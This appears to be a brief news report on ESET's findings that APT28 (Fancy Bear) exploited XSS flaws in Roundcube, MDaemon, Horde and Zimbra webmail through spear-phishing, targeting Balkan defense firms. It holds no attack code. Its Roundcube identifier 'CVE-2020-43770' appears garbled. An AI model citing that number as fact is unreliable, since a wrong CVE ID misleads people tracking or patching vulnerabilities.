In a striking return to older attack methods, suspected Russian hackers have successfully infiltrated multiple high-value mail servers worldwide by exploiting several cross-site scripting (XSS) vulnerabilities. This information was revealed in a report from security firm ESET, highlighting an alarming resurgence of these long-dormant vulnerabilities that were once rampant in the early 2000s.
The hacking group, believed to be backed by the Kremlin and known by various names including Sednit, APT28, Fancy Bear, Forest Blizzard, and Sofacy, has taken advantage of mail server software designed by four different manufacturers: Roundcube, MDaemon, Horde, and Zimbra. According to ESET, the group’s recent operations have predominantly targeted defense contractors in Bulgaria and Romania, with some of these firms involved in the production of Soviet-era weaponry for Ukraine amid the ongoing conflict with Russia.
ESET’s analysis suggests that the hacking operation, dubbed RoundPress, used spear-phishing emails to disseminate the XSS exploits. The emails embedded malicious HTML that enabled the hackers to execute their attacks. Notably, the group has recently exploited the now-patched CVE-2020-43770 vulnerability in Roundcube, alongside XSS vulnerabilities found in Horde, MDaemon, and Zimbra. Many of these exploits had gone unnoticed until ESET highlighted them, including one that was a zero-day vulnerability when initially exploited.
The implications of these attacks extend beyond individual mail accounts, successfully breaching not only private companies but targeting government organizations across Europe, Africa, and South America. As the XSS vulnerabilities were first made notorious by attacks such as the Samy Worm in 2005, experts are now on alert for a potential resurgence of similar vulnerabilities.